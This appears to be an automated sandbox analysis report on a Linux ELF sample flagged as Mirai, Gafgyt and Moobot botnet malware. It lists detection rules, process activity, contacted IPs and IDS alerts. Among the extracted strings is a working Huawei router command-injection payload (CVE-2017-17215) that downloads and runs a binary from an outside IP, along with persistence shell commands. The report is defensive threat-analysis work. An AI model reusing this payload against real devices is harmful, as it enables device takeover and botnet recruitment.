          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
          Source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
          Source: Process Memory Space: x86_64.elf PID: 6226, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
          Source: ELF static info symbol of initial sample.symtab present: no
          Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: Initial sampleString containing 'busybox' found: /bin/busybox
          Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKarmarm7mipsmipselx86_64sh4ppcm68k<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 38.55.196.186 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
          Source: Initial sampleString containing 'busybox' found: Content-Length: /bin/busybox/bin/watchdog/bin/systemdbinrm -rf && mkdir ; > && mv ; chmod 777 3f
          Source: classification engineClassification label: mal100.troj.linELF@0/0@1/0

          Persistence and Installation Behavior

          barindex
          Sets full permissions to files and/or directories
          Source: /bin/sh (PID: 6231)Chmod executable with 777: /usr/bin/chmod -> chmod 777 bin/watchdog
          Source: /bin/sh (PID: 6229)Mkdir executable: /usr/bin/mkdir -> mkdir bin@\\x9e~l\\xfc
          Source: /bin/sh (PID: 6231)Chmod executable: /usr/bin/chmod -> chmod 777 bin/watchdog
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/6234/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/6235/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/1582/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/3088/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/230/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/110/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/231/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/111/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/232/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/1579/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/112/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/233/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/1699/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/113/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/234/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/1335/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/1698/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/114/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/235/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/1334/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/1576/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/2302/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/115/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/236/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/116/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/237/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/117/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/118/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/910/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/119/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/912/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/10/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/2307/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/11/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/918/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/12/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/13/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/14/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/15/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/16/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/17/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/18/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/1594/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/120/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/121/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/1349/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/1/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/122/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/243/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/123/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/2/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/124/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/3/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/4/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/125/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/126/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/1344/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/1465/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/1586/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/127/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/6/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/248/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/128/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/249/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/1463/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/800/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/9/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/801/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/20/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/21/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/1900/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/22/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/23/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/24/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/25/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/26/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/27/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/28/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/29/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/491/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/250/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/130/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/251/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/252/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/132/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/253/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/254/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/255/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/256/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/1599/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/257/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/1477/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/379/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/258/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/1476/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/259/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/1475/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/936/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/30/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/2208/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/35/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/1809/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/1494/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/260/cmdline
          Source: /tmp/x86_64.elf (PID: 6233)File opened: /proc/261/cmdline
          Source: /tmp/x86_64.elf (PID: 6227)Shell command executed: sh -c "rm -rf bin/watchdog && mkdir bin@\\x9e~l\\xfc; >bin/watchdog && mv /tmp/x86_64.elf bin/watchdog; chmod 777 bin/watchdog"
          Source: /bin/sh (PID: 6228)Rm executable: /usr/bin/rm -> rm -rf bin/watchdog
          Source: submitted sampleStderr: sh: 1: cannot create bin/watchdog: Directory nonexistentchmod: cannot access 'bin/watchdog': No such file or directory: exit code = 0

          Hooking and other Techniques for Hiding and Protection

          barindex
          Uses known network protocols on non-standard ports
          Source: unknownNetwork traffic detected: HTTP traffic on port 59722 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 59722
          Source: unknownNetwork traffic detected: HTTP traffic on port 48448 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 48448
          Source: unknownNetwork traffic detected: HTTP traffic on port 53138 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 53138
          Source: unknownNetwork traffic detected: HTTP traffic on port 46886 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 46886
          Source: unknownNetwork traffic detected: HTTP traffic on port 55138 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55138 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55138 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55138 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55138 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55138 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 47404 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 43420 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55010 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 45848 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55956 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55956 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55956 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55956 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55956 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55138 -> 37215
          Source: unknownNetwork traffic detected: HTTP traffic on port 55956 -> 37215

          Stealing of Sensitive Information

          barindex
          Yara detected Mirai
          Source: Yara matchFile source: x86_64.elf, type: SAMPLE
          Source: Yara matchFile source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY
          Yara detected Moobot
          Source: Yara matchFile source: x86_64.elf, type: SAMPLE
          Source: Yara matchFile source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected Mirai
          Source: Yara matchFile source: x86_64.elf, type: SAMPLE
          Source: Yara matchFile source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY
          Yara detected Moobot
          Source: Yara matchFile source: x86_64.elf, type: SAMPLE
          Source: Yara matchFile source: 6226.1.0000000000400000.000000000040f000.r-x.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Scripting          		Path InterceptionPath Interception1
          File and Directory Permissions Modification          		1
          OS Credential Dumping          		System Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Scripting          		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth11
          Non-Standard Port          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          File Deletion          		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer3
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud

          Malware Configuration

          No configs have been found

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Number of created Files
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 830862 Sample: x86_64.elf Startdate: 20/03/2023 Architecture: LINUX Score: 100 25 test.zxyes.xyz 2->25 27 197.186.143.240, 37215 airtel-tz-asTZ Tanzania United Republic of 2->27 29 99 other IPs or domains 2->29 31 Snort IDS alert for network traffic 2->31 33 Malicious sample detected (through community Yara rule) 2->33 35 Multi AV Scanner detection for submitted file 2->35 37 6 other signatures 2->37 8 x86_64.elf 2->8         started        signatures3 process4 process5 10 x86_64.elf sh 8->10         started        12 x86_64.elf 8->12         started        process6 14 sh chmod 10->14         started        17 sh rm 10->17         started        19 sh mkdir 10->19         started        21 x86_64.elf 12->21         started        23 x86_64.elf 12->23         started        signatures7 39 Sets full permissions to files and/or directories 14->39

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          x86_64.elf54%ReversingLabsLinux.Trojan.Gafgyt
          x86_64.elf62%VirustotalBrowse
          x86_64.elf100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          test.zxyes.xyz2%VirustotalBrowse

          URLs

          No Antivirus matches

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          test.zxyes.xyz
          		195.133.40.202
          		truetrueunknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://schemas.xmlsoap.org/soap/encoding/x86_64.elffalse
            		high
            http://schemas.xmlsoap.org/soap/envelope/x86_64.elffalse
              		high

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              48.44.130.197
              		unknownUnited States
              		2686ATGS-MMD-ASUSfalse
              157.38.56.200
              		unknownIndia
              		55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
              157.176.29.113
              		unknownUnited States
              		22192SSHENETUSfalse
              197.74.23.198
              		unknownSouth Africa
              		16637MTNNS-ASZAfalse
              197.53.155.29
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              41.122.201.84
              		unknownSouth Africa
              		16637MTNNS-ASZAfalse
              146.152.47.124
              		unknownUnited States
              		197938TRAVIANGAMESDEfalse
              197.213.253.204
              		unknownZambia
              		37287ZAIN-ZAMBIAZMfalse
              41.169.198.158
              		unknownSouth Africa
              		36937Neotel-ASZAfalse
              157.196.121.203
              		unknownUnited States
              		4704SANNETRakutenMobileIncJPfalse
              197.23.125.172
              		unknownTunisia
              		37693TUNISIANATNfalse
              157.105.160.16
              		unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
              41.8.49.9
              		unknownSouth Africa
              		29975VODACOM-ZAfalse
              157.217.5.100
              		unknownUnited States
              		4704SANNETRakutenMobileIncJPfalse
              197.237.231.8
              		unknownKenya
              		15399WANANCHI-KEfalse
              41.65.28.168
              		unknownEgypt
              		36992ETISALAT-MISREGfalse
              41.59.61.45
              		unknownTanzania United Republic of
              		327795Tanzania-e-Government-AgencyTZfalse
              157.123.156.219
              		unknownUnited States
              		17623CNCGROUP-SZChinaUnicomShenzennetworkCNfalse
              93.5.186.154
              		unknownFrance
              		15557LDCOMNETFRfalse
              197.72.189.251
              		unknownSouth Africa
              		16637MTNNS-ASZAfalse
              157.72.111.107
              		unknownJapan131932JEIS-NETJREastInformationSystemsCompanyJPfalse
              197.136.200.42
              		unknownKenya
              		36914KENET-ASKEfalse
              157.33.78.117
              		unknownIndia
              		55836RELIANCEJIO-INRelianceJioInfocommLimitedINfalse
              197.205.151.144
              		unknownAlgeria
              		36947ALGTEL-ASDZfalse
              157.80.125.239
              		unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
              41.239.143.175
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              41.19.247.140
              		unknownSouth Africa
              		29975VODACOM-ZAfalse
              197.46.117.94
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              194.117.2.244
              		unknownPortugal
              		1930RCCNFundacaoparaaCienciaeaTecnologiaIPPTfalse
              79.234.252.24
              		unknownGermany
              		3320DTAGInternetserviceprovideroperationsDEfalse
              115.72.55.159
              		unknownViet Nam
              		7552VIETEL-AS-APViettelGroupVNfalse
              157.62.93.23
              		unknownUnited States
              		22192SSHENETUSfalse
              197.1.57.248
              		unknownTunisia
              		37705TOPNETTNfalse
              197.26.206.182
              		unknownTunisia
              		37492ORANGE-TNfalse
              41.45.135.158
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              206.139.33.106
              		unknownUnited States
              		701UUNETUSfalse
              157.58.60.204
              		unknownUnited States
              		3598MICROSOFT-CORP-ASUSfalse
              87.172.55.173
              		unknownGermany
              		3320DTAGInternetserviceprovideroperationsDEfalse
              157.169.35.46
              		unknownFrance
              		2418FR-ASNBLOCK2FR-MAN-SOPHIA-ANTIPOLISEUfalse
              149.191.121.174
              		unknownUnited Kingdom
              		87INDIANA-ASUSfalse
              95.202.225.248
              		unknownSweden
              		3301TELIANET-SWEDENTeliaCompanySEfalse
              197.254.107.31
              		unknownKenya
              		15808ACCESSKENYA-KEACCESSKENYAGROUPLTDisanISPservingKEfalse
              41.102.185.49
              		unknownAlgeria
              		36947ALGTEL-ASDZfalse
              157.134.238.88
              		unknownUnited States
              		600OARNET-ASUSfalse
              157.13.235.114
              		unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
              122.4.134.49
              		unknownChina
              		4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
              197.103.64.229
              		unknownSouth Africa
              		3741ISZAfalse
              47.210.9.39
              		unknownUnited States
              		19108SUDDENLINK-COMMUNICATIONSUSfalse
              197.89.111.98
              		unknownSouth Africa
              		10474OPTINETZAfalse
              41.216.98.143
              		unknownMauritius
              		37006LiquidTelecommunicationRwandaRWfalse
              41.129.126.38
              		unknownEgypt
              		24863LINKdotNET-ASEGfalse
              157.230.1.108
              		unknownUnited States
              		14061DIGITALOCEAN-ASNUSfalse
              157.222.228.77
              		unknownUnited States
              		4704SANNETRakutenMobileIncJPfalse
              157.161.217.237
              		unknownSwitzerland
              		6772IMPNET-ASCHfalse
              157.226.136.214
              		unknownUnited States
              		4704SANNETRakutenMobileIncJPfalse
              205.2.65.111
              		unknownUnited States
              		2914NTT-COMMUNICATIONS-2914USfalse
              157.254.86.101
              		unknownUnited States
              		21949BEANFIELDCAfalse
              197.101.23.155
              		unknownSouth Africa
              		3741ISZAfalse
              197.210.172.223
              		unknownNigeria
              		29465VCG-ASNGfalse
              197.96.161.40
              		unknownSouth Africa
              		3741ISZAfalse
              197.79.7.157
              		unknownSouth Africa
              		16637MTNNS-ASZAfalse
              197.153.24.58
              		unknownMorocco
              		36925ASMediMAfalse
              41.114.235.102
              		unknownSouth Africa
              		16637MTNNS-ASZAfalse
              157.80.173.179
              		unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
              41.6.144.164
              		unknownSouth Africa
              		29975VODACOM-ZAfalse
              197.184.140.192
              		unknownSouth Africa
              		37105NEOLOGY-ASZAfalse
              157.18.53.107
              		unknownChina
              		17816CHINA169-GZChinaUnicomIPnetworkChina169Guangdongprovifalse
              157.188.106.231
              		unknownUnited States
              		22252AS22252USfalse
              41.19.200.147
              		unknownSouth Africa
              		29975VODACOM-ZAfalse
              157.187.164.250
              		unknownUnited States
              		668DNIC-AS-00668USfalse
              188.177.148.186
              		unknownDenmark
              		3292TDCTDCASDKfalse
              206.178.178.107
              		unknownCanada
              		808GONET-ASN-1CAfalse
              157.220.82.193
              		unknownUnited States
              		4704SANNETRakutenMobileIncJPfalse
              13.158.137.172
              		unknownUnited States
              		7018ATT-INTERNET4USfalse
              197.10.162.30
              		unknownTunisia
              		5438ATI-TNfalse
              41.154.82.166
              		unknownSouth Africa
              		37079SMMTZAfalse
              172.109.115.29
              		unknownUnited States
              		5650FRONTIER-FRTRUSfalse
              197.99.218.120
              		unknownSouth Africa
              		3741ISZAfalse
              41.165.84.90
              		unknownSouth Africa
              		36937Neotel-ASZAfalse
              41.214.222.100
              		unknownMorocco
              		36925ASMediMAfalse
              197.189.71.108
              		unknownCongo The Democratic Republic of The
              		37598EbaleCDfalse
              197.69.47.19
              		unknownSouth Africa
              		16637MTNNS-ASZAfalse
              223.58.243.35
              		unknownKorea Republic of
              		9644SKTELECOM-NET-ASSKTelecomKRfalse
              41.180.28.137
              		unknownSouth Africa
              		36916X-DSL-NET1ZAfalse
              197.86.231.209
              		unknownSouth Africa
              		10474OPTINETZAfalse
              197.186.143.240
              		unknownTanzania United Republic of
              		37133airtel-tz-asTZfalse
              197.240.131.170
              		unknownunknown
              		37705TOPNETTNfalse
              41.227.79.14
              		unknownTunisia
              		37693TUNISIANATNfalse
              191.32.138.27
              		unknownBrazil
              		18881TELEFONICABRASILSABRfalse
              197.57.27.71
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              189.107.50.172
              		unknownBrazil
              		7738TelemarNorteLesteSABRfalse
              71.54.172.194
              		unknownUnited States
              		209CENTURYLINK-US-LEGACY-QWESTUSfalse
              197.58.199.7
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse
              187.179.239.28
              		unknownMexico
              		6503AxtelSABdeCVMXfalse
              157.146.127.14
              		unknownUnited States
              		719ELISA-ASHelsinkiFinlandEUfalse
              41.73.250.153
              		unknownNigeria
              		16284UNSPECIFIEDNGfalse
              54.83.86.235
              		unknownUnited States
              		14618AMAZON-AESUSfalse
              41.137.188.207
              		unknownMorocco
              		36884MAROCCONNECTMAfalse
              193.117.242.240
              		unknownUnited Kingdom
              		47474VIRTUAL1GBfalse
              197.62.182.95
              		unknownEgypt
              		8452TE-ASTE-ASEGfalse

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASNs

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
              Entropy (8bit):6.2742321349280346
              TrID:
              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
              File name:x86_64.elf
              File size:63296
              MD5:31bc5e9f752e5b6bbd24544e54142086
              SHA1:2a2cfe59b83fb19829cc19fe1dfbc7d6cd6b57ff
              SHA256:334de74bf734a40b9a1d9b9f8fc9b694bd3ae544d99c09a7e5dd400d5cf3343b
              SHA512:26deee18cdbb7c4f9f359c1959d308378ad6fd294952573504bc4cd7f7e3476c9a9974250808240681e527389e062d9eaa5cc6c369613d493b0031e8a132e02d
              SSDEEP:1536:dpmbSQ6U3q7cCBT/lZsK/0DiQyLiKimfFoktCe3fYRMI:WShU3q7cEDlCK/0DK9i8Fok06fYRz
              TLSH:4D534B17B58280FDC09AC1744B2BBA3AD93775FD0378B2A677D0EB222CA6D211E1DD44
              File Content Preview:.ELF..............>.......@.....@...................@.8...@.......................@.......@...............................................P.......P.............................Q.td....................................................H...._....:...H........

              Static ELF Info

              ELF header

              Class:
              Data:
              Version:
              Machine:
              Version Number:
              Type:
              OS/ABI:
              ABI Version:
              Entry Point Address:
              Flags:
              ELF Header Size:
              Program Header Offset:
              Program Header Size:
              Number of Program Headers:
              Section Header Offset:
              Section Header Size:
              Number of Section Headers:
              Header String Table Index:

              Sections

              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
              NULL0x00x00x00x00x0000
              .initPROGBITS0x4000e80xe80x130x00x6AX001
              .textPROGBITS0x4001000x1000xc8660x00x6AX0016
              .finiPROGBITS0x40c9660xc9660xe0x00x6AX001
              .rodataPROGBITS0x40c9800xc9800x23900x00x2A0032
              .ctorsPROGBITS0x50f0000xf0000x100x00x3WA008
              .dtorsPROGBITS0x50f0100xf0100x100x00x3WA008
              .dataPROGBITS0x50f0400xf0400x4400x00x3WA0032
              .bssNOBITS0x50f4800xf4800x2a100x00x3WA0032
              .shstrtabSTRTAB0x00xf4800x3e0x00x0001

              Program Segments

              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
              LOAD0x00x4000000x4000000xed100xed106.40150x5R E0x100000.init .text .fini .rodata
              LOAD0xf0000x50f0000x50f0000x4800x2e902.16440x6RW 0x100000.ctors .dtors .data .bss
              GNU_STACK0x00x00x00x00x00.00000x6RW 0x8

              Network Behavior

              Snort IDS Alerts

              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              192.168.2.2341.237.57.2459722372152835222 03/20/23-18:45:24.095464TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5972237215192.168.2.2341.237.57.24
              192.168.2.2334.117.60.12155010372152835222 03/20/23-18:46:43.951969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5501037215192.168.2.2334.117.60.121
